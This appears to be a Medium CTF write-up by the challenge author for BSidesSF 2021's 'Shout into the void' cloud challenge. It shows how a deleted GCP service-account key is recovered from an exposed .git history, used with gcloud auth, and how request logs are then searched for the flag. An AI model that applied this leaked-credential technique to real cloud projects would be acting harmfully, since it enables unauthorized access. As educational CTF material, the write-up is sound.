Challenge writer POV: BSidesSF 2021 CTF (Cloud)

Whole new me

Shout into the void

User-agent: *
Disallow: /.git/*
> git log
commit 8170c6c35cccffe0f9e2715fd7b81c832e5d9fd1 (HEAD -> master)
Author: corgi <corgi@corgiwoofwoof.com>
Date: Fri Mar 5 19:55:42 2021 -0800
clean up completecommit 543e9d358dbd4276da5277291624d16fb8b9d56a
Author: corgi <corgi@corgiwoofwoof.com>
Date: Fri Mar 5 19:55:00 2021 -0800
remove this later> git show
commit 8170c6c35cccffe0f9e2715fd7b81c832e5d9fd1 (HEAD -> master)
Author: corgi <corgi@corgiwoofwoof.com>
Date: Fri Mar 5 19:55:42 2021 -0800
clean up completediff --git a/booming-cosine-304921-5327fdaff786.json b/booming-cosine-304921-5327fdaff786.json
deleted file mode 100644
index a440f42..0000000
--- a/booming-cosine-304921-5327fdaff786.json
+++ /dev/null
@@ -1,12 +0,0 @@
-{
- "type": "service_account",
- "project_id": "booming-cosine-304921",
- "private_key_id": "5327fdaff786b034f9dc37834326fd83dfa1d972",
- "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvQIBADANBgkqhkiG...
gcloud auth activate-service-account --key-file=key.json --project=booming-cosine-304921
> gcloud logging logs list
NAME
projects/example-project/logs/%2Fvar%2Flog%2Fgoogle_init.log
projects/example-project/logs/%2Fvar%2Flog%2Fnginx%2Ferror.log
projects/example-project/logs/appengine.googleapis.com%2Frequest_log
projects/example-project/logs/cloudaudit.googleapis.com%2Factivity
projects/example-project/logs/cloudaudit.googleapis.com%2Fdata_access
projects/example-project/logs/cloudaudit.googleapis.com%2Fsystem_event
projects/example-project/logs/cloudbuild
projects/example-project/logs/clouderrorreporting.googleapis.com%2Finsights
projects/example-project/logs/stderr
projects/example-project/logs/varlog%2Fsystem
> gcloud logging read request_log> gcloud logging read request_log | grep flag
resource: /send?message=https%3A%2F%2Fstorage.googleapis.com%2Fshout-into-void%2F1574AB2CB00533975094D87814BCF8FA707FD608-flag.txt

--

--

--

Security Engineer in silicon valley, foodie, gamer and serial doodler. Specialize in red teaming and application security.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why do we need 🤔! AWS App Mesh

AWS App Mesh Architecture

Write bug reports that don’t suck

Singly LinkedList in Java| Implement SLL

Securing CSRF using referer policy

Project Demo: This Or That App| Javascript, HTML, CSS, Ruby on Rails

Possible Ideas for Utilizing Selenium in One’s Everyday Life

Building an API consumer-first with Pact

| Engineering News-Record

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
its C0rg1

its C0rg1

Security Engineer in silicon valley, foodie, gamer and serial doodler. Specialize in red teaming and application security.

More from Medium

Codebreaker Challenge CTF Write Up 2022 (CBC-CTF)

My 50 cents on the OSWE Certification Exam

My Grind to OSCP

Cyber Apocalypse CTF 2022 Writeup — Down the Rabinhole